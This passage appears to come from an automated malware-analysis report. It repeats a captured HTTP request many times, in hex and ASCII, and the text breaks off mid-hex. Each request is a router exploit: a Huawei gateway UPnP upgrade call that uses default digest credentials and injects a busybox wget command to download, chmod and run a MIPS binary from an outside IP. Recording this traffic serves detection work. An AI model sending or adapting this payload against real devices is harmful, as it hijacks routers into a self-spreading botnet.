6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 